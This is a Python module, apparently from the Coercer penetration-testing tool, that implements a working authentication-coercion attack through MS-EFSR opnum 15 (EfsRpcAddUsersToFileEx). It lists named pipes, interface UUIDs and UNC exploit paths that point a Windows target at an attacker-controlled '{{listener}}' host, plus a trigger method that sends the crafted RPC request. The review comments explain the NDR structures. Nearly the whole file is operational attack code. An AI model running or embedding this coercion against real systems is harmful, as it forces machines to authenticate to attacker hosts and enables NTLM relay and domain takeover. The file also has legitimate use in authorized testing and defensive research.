coercer.methods.MS_EFSR.EfsRpcAddUsersToFileEx

  1#!/usr/bin/env python3
  2# -*- coding: utf-8 -*-
  3# File name          : EfsRpcAddUsersToFileEx.py
  4# Author             : Podalirius (@podalirius_)
  5# Fixed by           : XiaoliChan
  6# Date created       : 16 Sep 2022
  7# Updated in         : 18 Mar 2023
  8
  9
 10from coercer.models.MSPROTOCOLRPCCALL import MSPROTOCOLRPCCALL
 11from coercer.network.DCERPCSessionError import DCERPCSessionError
 12from impacket.dcerpc.v5.ndr import NDRCALL, NDRSTRUCT
 13from impacket.dcerpc.v5.dtypes import UUID, ULONG, WSTR, DWORD, LONG, NULL, BOOL, UCHAR, PCHAR, RPC_SID, LPWSTR, GUID, NDRPOINTERNULL
 14
class EFS_RPC_BLOB(NDRSTRUCT):
    """NDR layout of an EFSRPC blob: one DWORD followed by a char pointer.

    Only the field order drives what impacket puts on the wire; the labels
    are local to this file.
    NOTE(review): the labels look swapped relative to MS-EFSR 2.2.3, where
    the DWORD is the byte count (cbData) and the pointer is the data (bData).
    The request below never populates this struct, so it is harmless today;
    confirm against the spec before anyone indexes these fields by name.
    """
    structure = (
        ('Data', DWORD),
        ('cbData', PCHAR),
    )
 20
class EFS_HASH_BLOB(NDRSTRUCT):
    """NDR layout of a certificate-hash blob: one DWORD followed by a char pointer.

    Same shape as EFS_RPC_BLOB; only the field order matters on the wire.
    NOTE(review): as with EFS_RPC_BLOB, the labels appear swapped relative to
    the spec (count first, data pointer second) -- confirm before relying on
    the names.
    """
    structure = (
        ('Data', DWORD),
        ('cbData', PCHAR),
    )
 26
class ENCRYPTION_CERTIFICATE_HASH(NDRSTRUCT):
    """NDR layout of one certificate-hash entry: length, owner SID, hash blob, display name.

    'Lenght' is a typo for 'Length'; it is only a local label and has no
    effect on the marshalled bytes, so it is left as-is rather than risk
    breaking a caller that indexes the field by name.
    """
    structure = (
        ('Lenght', DWORD),
        ('SID', RPC_SID),
        ('Hash', EFS_HASH_BLOB),
        ('Display', LPWSTR),
    )
 34
class ENCRYPTION_CERTIFICATE_LIST(NDRSTRUCT):
    """NDR layout of the certificate list passed to EfsRpcAddUsersToFileEx.

    Declared as a count plus a single inline ENCRYPTION_CERTIFICATE_HASH.
    NOTE(review): the spec describes Users as a pointer to an array of
    pointers; this inline form is only known to be sufficient for the
    trigger below, which sends the struct at its default (zeroed) values.
    """
    structure = (
        ('nUsers', DWORD),
        ('Users', ENCRYPTION_CERTIFICATE_HASH),
    )
 40
 41
class _EfsRpcAddUsersToFileEx(NDRCALL):
    """Request marshaller for MS-EFSR opnum 15 (EfsRpcAddUsersToFileEx).

    FileName is the attacker-controlled argument: the trigger fills it with a
    UNC path to the listener. Reserved is left at its NDRPOINTERNULL default
    and EncryptionCertificates at its zeroed default.
    """
    opnum = 15
    structure = (
        ('dwFlags', DWORD),    # Type: DWORD
        # According to this page: https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-efsr/d36df703-edc9-4482-87b7-d05c7783d65e
        # Reserved must be set to NULL
        ('Reserved', NDRPOINTERNULL),   # Type: NDRPOINTERNULL *
        ('FileName', WSTR),    # Type: wchar_t *  (NUL-terminated; the exploit_paths carry the terminator)
        ('EncryptionCertificates', ENCRYPTION_CERTIFICATE_LIST),  # Type: ENCRYPTION_CERTIFICATE_LIST *
    )
 52
 53
class _EfsRpcAddUsersToFileExResponse(NDRCALL):
    """Response marshaller for opnum 15.

    Declares no fields, so nothing from the reply body is decoded; the
    trigger only cares whether the request raised, not what came back.
    """
    structure = ()
 56
 57
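class EfsRpcAddUsersToFileEx(MSPROTOCOLRPCCALL):
    """Coercion method built on MS-EFSR opnum 15, EfsRpcAddUsersToFileEx.

    FileName is the attacker-controlled argument (see ``function``); each
    entry in ``exploit_paths`` substitutes the listener into a UNC path so
    that the target, when it processes the call, is steered toward that
    host.

    https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-efsr/d36df703-edc9-4482-87b7-d05c7783d65e
    """

    # dwFlags values from the spec page above.  REPLACE_DDF requires
    # EncryptionCertificates to hold exactly one certificate, so the trigger
    # uses ADD_POLICY_KEYTYPE, which needs no certificate at all.
    EFSRPC_ADDUSERFLAG_ADD_POLICY_KEYTYPE = 0x00000002
    EFSRPC_ADDUSERFLAG_REPLACE_DDF = 0x00000004

    # FileName is marshalled as a WSTR, so every path carries its own
    # explicit NUL terminator as part of the value.
    exploit_paths = [
        ("smb", '\\\\{{listener}}\\Share\\file.txt\x00'),
        ("smb", '\\\\{{listener}}\\Share\\\x00'),
        ("smb", '\\\\{{listener}}\\Share\x00'),
    ]

    # Endpoints the framework may bind to.  NOTE(review): 'ncan_np' (not
    # 'ncacn_np') is presumably the key the rest of the project looks up;
    # confirm before renaming it.
    access = {
        "ncan_np": [
            {
                "namedpipe": r"\PIPE\efsrpc",
                "uuid": "df1941c5-fe89-4e79-bf10-463657acf44d",
                "version": "1.0"
            },
            {
                "namedpipe": r"\PIPE\lsarpc",
                "uuid": "c681d488-d850-11d0-8c52-00c04fd90f7e",
                "version": "1.0"
            },
            {
                "namedpipe": r"\PIPE\samr",
                "uuid": "c681d488-d850-11d0-8c52-00c04fd90f7e",
                "version": "1.0"
            },
            {
                "namedpipe": r"\PIPE\lsass",
                "uuid": "c681d488-d850-11d0-8c52-00c04fd90f7e",
                "version": "1.0"
            },
            {
                "namedpipe": r"\PIPE\netlogon",
                "uuid": "c681d488-d850-11d0-8c52-00c04fd90f7e",
                "version": "1.0"
            },
        ],
        "ncacn_ip_tcp": [
            {
                "uuid": "df1941c5-fe89-4e79-bf10-463657acf44d",
                "version": "1.0"
            },
            {
                "uuid": "c681d488-d850-11d0-8c52-00c04fd90f7e",
                "version": "1.0"
            }
        ]
    }

    protocol = {
        "longname": "[MS-EFSR]: Encrypting File System Remote (EFSRPC) Protocol",
        "shortname": "MS-EFSR"
    }

    function = {
        "name": "EfsRpcAddUsersToFileEx",
        "opnum": 15,
        "vulnerable_arguments": ["FileName"]
    }

    def trigger(self, dcerpc_session, target):
        """Send one EfsRpcAddUsersToFileEx request with ``self.path`` as FileName.

        Args:
            dcerpc_session: bound DCERPC session, or None if connect() was
                never called.
            target: unused here; kept for the common trigger signature.

        Returns:
            "" when the request completed without raising, the exception
            object when the request raised (the caller interprets it), or
            None when no session was supplied.
        """
        if dcerpc_session is None:
            print("[!] Error: dce is None, you must call connect() first.")
            return None

        try:
            request = _EfsRpcAddUsersToFileEx()
            # ADD_POLICY_KEYTYPE needs no certificate, so EncryptionCertificates
            # and Reserved stay at their defaults; only FileName is meaningful.
            request['dwFlags'] = self.EFSRPC_ADDUSERFLAG_ADD_POLICY_KEYTYPE
            request['FileName'] = self.path
            dcerpc_session.request(request)
            return ""
        except Exception as err:
            # Deliberately broad: the failure (typically a DCERPCSessionError)
            # is handed back to the caller for interpretation, not raised.
            return err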